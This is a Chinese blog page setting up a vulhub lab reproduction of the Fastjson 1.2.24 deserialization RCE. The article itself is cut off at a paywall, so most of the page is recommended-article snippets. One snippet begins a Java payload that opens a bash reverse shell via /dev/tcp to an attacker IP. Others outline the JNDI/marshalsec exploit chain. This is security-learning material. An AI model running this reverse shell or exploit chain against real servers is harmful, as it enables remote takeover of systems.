fastjson1.2.24-RCE漏洞复现

最新推荐文章于 2025-03-17 10:45:19 发布

原创

最新推荐文章于 2025-03-17 10:45:19 发布 · 2.1k 阅读

37 ·

CC 4.0 BY-SA版权

文章标签：

#json #java

本文详细描述了一个在靶场环境中，通过Fastjson漏洞检测、构造恶意请求并利用Java反弹shell进行攻击的过程，涉及KaliLinux、Docker、marshalsec工具以及LDAP服务器的使用。

触发过程图

靶场模拟

1、实验环境准备

攻击者

kali（192.168.101.141）

使用工具：marshalsec-0.0.3-SNAPSHOT-all.jar

GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

被攻击者

centos7（192.168.101.148）

使用工具：docker

docker-compose

vulhub/fastjson1.2.24-rce

centos进入fastjson/1.2.24-rce目录，开启docker-compose服务，默认开启8090端口

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

three_1996

关注关注

47
点赞
踩
37

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现

一剑开天门！的博客

02-17

2302

【vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

oiadkt的博客

04-12

1761

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

参与评论您还未登录，请先登录后发表或查看评论

java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all

12-27

marshalsec命令格式如下： java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明： -a：生成exploit下的所有payload(例如：hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin） -t：对生成的payloads进行解码测试 -v：verbose mode, 展示生成的payloads gadget_type：指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>：指定exploits，根目录下的java文件名

marshalsec-0.0.3-SNAPSHOT-all.jar

12-14

marshalsec-0.0.3-SNAPSHOT-all.jar，渗透测试

CVE与重要漏洞复现之Fastjson1.2.24-RCE漏洞复现

最新发布

没有网络安全就没有国家安全

03-17

1691

CVE与重要漏洞复现之Fastjson1.2.24-RCE漏洞复现

Fastjson 漏洞复现1.2.24-rce

人们并不感谢罗辑

08-22

2115

fastjson是阿里巴巴开源的一个json解析库，能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键，autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制，攻击者可以构造恶意的json字符串来触发这个漏洞

网络安全--Fastjson1.2.24-RCE漏洞

weixin_46066254的博客

12-04

810

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，autoType标注了类对应的原始类型，方便在反序列化的时候定位到具体类型，fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。因为有了autoType功能，那么fastjson在对JSON字符串进行反序列化的时候，就会读取@type到内容，试图把JSON内容反序列化成这个对象，并且会调用这个类的setter方法。

CVE-2017-18349靶场复现（Fastjson1.2.24-RCE）

zjxxxy的博客

03-15

373

CVE-2017-18349靶场复现（Fastjson1.2.24-RCE）

Fastjson1.2.24RCE漏洞复现

L1928的博客

05-18

1479

1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.

fastjson 1.2.24 反序列化 RCE 漏洞复现

m0_63299551的博客

06-27

761

具体可以参考这篇文章FastJson的介绍与使用（一）_maven fastjson-优快云博客fastjson最主要的功能就是可以将Java对象和json之间来回转化，而这个漏洞出现的原因就是在反序列化的过程中。

fastjson-rce-exploit:利用fastjson远程执行代码漏洞

03-15

fastjson-rce-exploit poc for fastjson远程执行代码漏洞

fastjson 1.2.24 rce漏洞复现

wutiangui的博客

11-06

502

fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。把编译好的class文件传到外网系统中，并在class文件所在的目录，Python起一个http服务。访问http://192.168.232.131:8090/即可看到JSON格式的输出。

fastjson 1.2.24漏洞复现

qq_18831583的博客

01-13

1025

fastjson 1.2.24漏洞复现

【漏洞库】Fastjson_1.2.24_rce

yuan_boss的博客

09-08

1360

我们可以看到connect方法中具有JNDI的lookup方法，lookup是JNDI用于查找资源的方法，里面传的参数是dataSourceName，所以我们可以在payload的json字符串中传入这个参数dataSourceName，并且指定他的值为我们的RMI服务或者其他服务，lookup就会到我们指定的服务中下载恶意代码并执行。fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。

Fastjson 1.2.24漏洞搭建及复现——详解

网安小白的博客

08-02

1924

反序列化Fastjson1.2.24漏洞复现全过程，图文详解，包含复现过程中出现各种问题~

vulhub之fastjson篇-1.2.24-rce

weixin_56306210的博客

04-08

769

vulhub之fastjson篇-1.2.24-rce

探索Fastjson漏洞利用工具：Fastjson_rec_exploit

gitblog_00042的博客

04-19

868

探索Fastjson漏洞利用工具：Fastjson_rec_exploit 去发现同类优质开源项目:https://gitcode.com/ 在软件开发中，安全是至关重要的一环。尤其是当我们处理JSON数据时，一个小小的疏忽可能导致严重的安全问题。项目，这是一个用于检测并演示Fastjson漏洞的工具。项目简介 Fastjson_rec_exploit是一个轻量级、易于使用的命令行工具，它旨在帮...

FastJson漏洞工具

dahe

06-15

5416

有的时候，我们在渗透ceshi 1.下载地址 https://github.com/nex121/FastjsonEXP

【亲测免费】探索快速且精准的Fastjson漏洞检测工具：FastjsonScan

gitblog_00045的博客

05-16

1646

在今天这个高度数字化的时代，数据的安全性至关重要。作为Java世界中广泛使用的JSON解析库，Fastjson因其高效性能深受开发者喜爱。然而，随之而来的是频繁出现的安全隐患。为此，我们向您推荐一款强大且持续更新的漏洞探测工具——[FastjsonScan][1]，旨在帮助您及时发现并解决Fastjson的反序列化漏洞。 ## 项目介绍 FastjsonScan是一款专为探测Fastjson漏...

fastjson1.2.24rce漏洞复现

06-06

fastjson1.2.24rce漏洞是一种Java反序列化漏洞，攻击者可以通过构造恶意的JSON数据包，触发目标服务器上的fastjson库反序列化漏洞，从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中，已经被修复。如果您使用的是fastjson 1.2.24及之前版本，请及时升级到最新版本以避免被攻击。